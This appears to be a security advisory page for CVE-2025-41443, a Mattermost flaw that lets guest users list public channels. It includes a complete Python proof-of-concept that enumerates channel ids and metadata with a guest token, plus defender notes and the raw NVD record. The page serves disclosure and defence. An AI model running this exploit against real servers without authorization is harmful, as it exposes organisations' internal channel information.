Security Vulnerability Report
CVE-2025-41443 CVSS 4.3 MEDIUM

CVE-2025-41443

Published: 2025-10-16 08:15:36
Last Modified: 2025-10-29 08:15:30

Description

Mattermost versions 10.5.x <= 10.5.12 and 10.11.x <= 10.11.2 fail to properly validate guest user permissions when accessing channel information, which allows guest users to discover active public channels and their metadata via the `/api/v4/teams/{team_id}/channels/ids` endpoint.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:* - VULNERABLE
Mattermost 10.5.x <= 10.5.12
Mattermost 10.11.x <= 10.11.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2025-41443 - Mattermost Guest User Channel Information Disclosure PoC

This PoC demonstrates how a guest user can enumerate public channels via the
/api/v4/teams/{team_id}/channels/ids endpoint due to improper permission
validation (NVD weakness on this report: CWE-862, missing authorization).

What the script actually does: at most two kinds of authenticated GET
requests with the guest account's bearer token -- one to the team channel-id
listing endpoint, then (for up to five returned ids) one to
/api/v4/channels/{channel_id}. Nothing is written or modified server-side.

Defender notes:
- Detection: a guest-role account receiving HTTP 200 from
  /api/v4/teams/{team_id}/channels/ids, especially followed by a burst of
  /api/v4/channels/{id} lookups, is the signal; a 403 on the first call is
  the expected behaviour of a fixed server.
- Mitigation: upgrade to a release outside the ranges this report lists
  (10.5.x <= 10.5.12, 10.11.x <= 10.11.2); see the vendor advisory linked in
  the references. NOTE(review): the NVD CPE data on this page ends the 10.5
  range at versionEndExcluding 10.5.11, which disagrees with the description's
  "<= 10.5.12" -- confirm the fixed version against the vendor advisory.
"""
import requests
import json  # NOTE(review): not used anywhere in this script
import sys


class MattermostGuestExploit:
    """Thin wrapper around the two Mattermost REST calls used by the PoC.

    Holds the target base URL, the team id and the request headers built
    from the guest session token; every method issues a single GET with a
    10-second timeout and reports the outcome on stdout.
    """

    def __init__(self, base_url: str, team_id: str, session_token: str) -> None:
        """
        Initialize the exploit with target Mattermost server details.
        :param base_url: Base URL of the Mattermost server (e.g., https://mattermost.example.com);
            a trailing slash is stripped so the endpoint paths below join cleanly
        :param team_id: The team ID the guest user belongs to
        :param session_token: Authentication token (cookie or bearer token) for the guest account;
            it is sent as an `Authorization: Bearer` header, so a raw cookie value only works
            if the server accepts the session id in that header -- verify against the target
        """
        self.base_url = base_url.rstrip('/')
        self.team_id = team_id
        # Content-Type is set even though the requests are GETs with no body; harmless.
        self.headers = {
            'Authorization': f'Bearer {session_token}',
            'Content-Type': 'application/json',
            'User-Agent': 'Mozilla/5.0 (compatible; SecurityResearch/1.0)'
        }

    def list_team_channels(self) -> "list | None":
        """
        Exploit the vulnerable endpoint to list all public channels in the team.
        Normally, guest users should only see channels they are members of, but due
        to CVE-2025-41443, they can enumerate all active public channels.

        Returns the decoded JSON body on HTTP 200 (the caller treats it as a
        list of channel ids and slices it), and None on any other status code
        or on a transport error. Status handling:
          200 -> ids printed and returned
          401 -> token rejected
          403 -> authorization enforced, i.e. the server is likely fixed
          other -> status and raw body printed
        """
        endpoint = f"{self.base_url}/api/v4/teams/{self.team_id}/channels/ids"
        print(f"[*] Targeting endpoint: {endpoint}")
        print(f"[*] Sending request as guest user...")
        try:
            response = requests.get(endpoint, headers=self.headers, timeout=10)
            if response.status_code == 200:
                channels = response.json()
                print(f"[+] SUCCESS: Retrieved {len(channels)} channel(s)!")
                print("\n[*] Discovered Channel IDs:")
                for idx, channel_id in enumerate(channels, 1):
                    print(f" {idx}. {channel_id}")
                # Per-channel metadata is fetched by the caller (see main), not here.
                return channels
            elif response.status_code == 401:
                print("[-] Authentication failed. Check your session token.")
            elif response.status_code == 403:
                # A 403 here means the permission check is in place -- the expected
                # response from a patched build.
                print("[-] Access forbidden. The server may be patched.")
            else:
                print(f"[-] Unexpected status code: {response.status_code}")
                print(f" Response: {response.text}")
            return None
        except requests.exceptions.RequestException as e:
            # Connection / timeout / TLS errors are reported, not raised.
            print(f"[-] Request error: {e}")
            return None

    def get_channel_details(self, channel_id: str) -> "dict | None":
        """
        Fetch additional metadata for a discovered channel.

        :param channel_id: A channel id returned by list_team_channels
        :return: The decoded JSON body on HTTP 200, otherwise None. This is
            deliberately best-effort: non-200 responses and transport errors
            are swallowed and collapse to None so main can keep iterating.
        """
        endpoint = f"{self.base_url}/api/v4/channels/{channel_id}"
        try:
            response = requests.get(endpoint, headers=self.headers, timeout=10)
            if response.status_code == 200:
                return response.json()
        except requests.exceptions.RequestException:
            pass
        return None


def main() -> None:
    """Parse `<base_url> <team_id> <session_token>` from argv and run the PoC.

    Exits with status 1 on a wrong argument count. After the channel-id
    listing, metadata is requested for at most the first five ids and the
    `display_name`, `type` and `purpose` fields are printed, falling back to
    'N/A' when a field is absent.
    """
    if len(sys.argv) != 4:
        print(f"Usage: {sys.argv[0]} <base_url> <team_id> <session_token>")
        print(f"Example: {sys.argv[0]} https://mm.example.com abc123xyz cookie_value_or_token")
        sys.exit(1)
    base_url = sys.argv[1]
    team_id = sys.argv[2]
    session_token = sys.argv[3]
    print("=" * 70)
    print("CVE-2025-41443 - Mattermost Guest Channel Disclosure PoC")
    print("Affected: Mattermost 10.5.x <= 10.5.12, 10.11.x <= 10.11.2")
    print("=" * 70)
    exploit = MattermostGuestExploit(base_url, team_id, session_token)
    channels = exploit.list_team_channels()
    # An empty list is falsy, so a 200 with no channels also skips this section.
    if channels:
        print("\n[*] Attempting to fetch metadata for discovered channels...")
        for ch_id in channels[:5]:  # Limit to first 5 to avoid noise
            details = exploit.get_channel_details(ch_id)
            if details:
                print(f"\n Channel: {details.get('display_name', 'N/A')}")
                print(f" Type: {details.get('type', 'N/A')}")
                print(f" Purpose: {details.get('purpose', 'N/A')}")


if __name__ == "__main__":
    main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-41443", "sourceIdentifier": "[email protected]", "published": "2025-10-16T08:15:35.917", "lastModified": "2025-10-29T08:15:30.493", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Mattermost versions 10.5.x <= 10.5.12, 10.11.x <= 10.11.2 fail to properly validate guest user permissions when accessing channel information which allows guest users to discover active public channels and their metadata via the `/api/v4/teams/{team_id}/channels/ids` endpoint"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.5.0", "versionEndExcluding": "10.5.11", "matchCriteriaId": "9A7F5FBF-4910-4376-96DF-0549BA5259AE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.11.0", "versionEndExcluding": "10.11.3", "matchCriteriaId": "D4B91178-97CA-4799-A853-685F04C33F9E"}]}]}], "references": [{"url": "https://mattermost.com/security-updates", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}